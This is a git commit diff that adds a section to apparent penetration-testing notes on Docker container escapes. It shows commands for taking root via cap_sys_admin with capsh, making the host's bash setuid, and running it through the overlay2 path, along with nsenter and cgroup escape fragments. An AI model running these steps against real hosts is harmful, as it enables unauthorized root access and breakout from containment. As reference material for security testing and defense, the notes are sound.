bump
This commit is contained in:
whackx
parent
b15d5ea2ba
commit
840daf84da
|
|
@ -93,6 +93,9 @@ nsenter --target 1 --mount sh
|
|||
```
|
||||
|
||||
## Misconfiguration
|
||||
|
||||
### capabilities
|
||||
|
||||
* Privileged container connect to the host directly, not through the docker engine
|
||||
* Execution of bins on the host from libs inside the container is possible
|
||||
```sh
|
||||
|
|
@ -115,6 +118,19 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
|||
```
|
||||
* The file may appear outside the container on the host system
|
||||
|
||||
### cap_admin
|
||||
|
||||
`cap_sys_admin` provides the ability to spawn a root shell inside the container
|
||||
```sh
|
||||
capsh --gid=0 --uid=0 --
|
||||
```
|
||||
|
||||
Further, if there is access to the host this capability can be used to set `chmod u+s /bin/bash` and list the available mounts. The mounts can be listed `findmnt`.
|
||||
Resulting in a useable root bash on the host via executing it on the path of the docker volume, e.g.
|
||||
```sh
|
||||
/var/lib/docker/overlay2/l/randomhash/bin/bash -p
|
||||
```
|
||||
|
||||
## Check fdisk
|
||||
|
||||
* `fdisk -l` and `lsblk`, host bulk device may be exposed
|
||||
|
|
|
|||
Loading…
Reference in New Issue